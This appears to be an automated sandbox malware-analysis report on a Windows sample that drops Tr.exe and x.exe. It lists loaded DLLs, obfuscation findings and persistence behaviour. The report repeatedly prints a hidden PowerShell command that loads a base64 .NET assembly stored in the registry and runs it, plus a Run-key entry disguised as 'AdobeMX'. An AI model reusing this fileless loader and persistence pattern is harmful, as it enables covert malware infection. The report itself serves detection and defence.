Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn2.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: credui.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: odbc32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpqec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: qutil.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ws2help.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nci.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: devrtl.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: napmontr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: certcli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ndfapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wdi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: tdh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlanutil.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2pcollab.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlanhlp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: devrtl.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{35786D3C-B075-49B9-88DD-029876E11C01}\InProcServer32 Jump to behavior
Source: Microsoft.lnk.0.dr LNK file: ..\..\..\..\..\..\Local\Temp\x.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: ._cache_1.exe Static file information: File size 1178304 > 1048576

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 9.2.powershell.exe.2770000.0.raw.unpack, K4pNDLld8Rw0wdfmtZ.cs .Net Code: TH7j5ZAl9 System.Reflection.Assembly.Load(byte[])
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, K4pNDLld8Rw0wdfmtZ.cs .Net Code: TH7j5ZAl9 System.Reflection.Assembly.Load(byte[])
Suspicious command line found
Source: unknown Process created: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: unknown Process created: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
PE file contains an invalid checksum
Source: x.exe.0.dr Static PE information: real checksum: 0xa961f should be: 0x12293c
Source: ._cache_1.exe Static PE information: real checksum: 0xa961f should be: 0x12293c
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE8AC5 push ecx; ret 1_2_00AE8AD8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D7022D push eax; iretd 4_2_000007FE93D70241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D700BD pushad ; iretd 4_2_000007FE93D700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D7245D push eax; iretd 4_2_000007FE93D72471
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003AC590 push eax; retn 003Ah 12_2_003AC599
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C8AC5 push ecx; ret 12_2_003C8AD8
Source: 9.2.powershell.exe.2770000.0.raw.unpack, K4pNDLld8Rw0wdfmtZ.cs High entropy of concatenated method names: 'pFCMYGNqY', 'r4kYVPjGi', 'M6ftBDHZb', 'ywblfFXwp', 'Gpi7NbQNc', 'YASRYeyES', 'vfWIc4pND', 'od8NRw0wd', 'FmtAZa9H2', 'OAeWd0rmP'
Source: 9.2.powershell.exe.2770000.0.raw.unpack, A8v5UCNLAwXBSCX02v.cs High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'VwBYpLi450', 'nEGw0M2gN8Uyq', 'HF4MQKv6J3', 'ItNMuY1NiO', 'MSaMqN1AXA', 'PcgMdHtN53', 'DI3MkE5MCW', 'xIpMedHv7k', 'rTtMjkwu5r'
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, K4pNDLld8Rw0wdfmtZ.cs High entropy of concatenated method names: 'pFCMYGNqY', 'r4kYVPjGi', 'M6ftBDHZb', 'ywblfFXwp', 'Gpi7NbQNc', 'YASRYeyES', 'vfWIc4pND', 'od8NRw0wd', 'FmtAZa9H2', 'OAeWd0rmP'
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, A8v5UCNLAwXBSCX02v.cs High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'VwBYpLi450', 'nEGw0M2gN8Uyq', 'HF4MQKv6J3', 'ItNMuY1NiO', 'MSaMqN1AXA', 'PcgMdHtN53', 'DI3MkE5MCW', 'xIpMedHv7k', 'rTtMjkwu5r'
Drops PE files
Source: C:\Users\user\Desktop\._cache_1.exe File created: C:\Users\user\AppData\Local\Temp\Tr.exe Jump to dropped file
Source: C:\Users\user\Desktop\._cache_1.exe File created: C:\Users\user\AppData\Local\Temp\x.exe Jump to dropped file

Boot Survival
barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeMX Jump to behavior
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeMX C:\Windows\System32\cmd.exe /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null) Jump to behavior
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\._cache_1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\._cache_1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.lnk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeMX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeMX Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_0047A330
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_00AC4A35
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B453DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_00B453DF
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003A4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 12_2_003A4A35
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_004253DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 12_2_004253DF
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE3307 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00AE3307
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
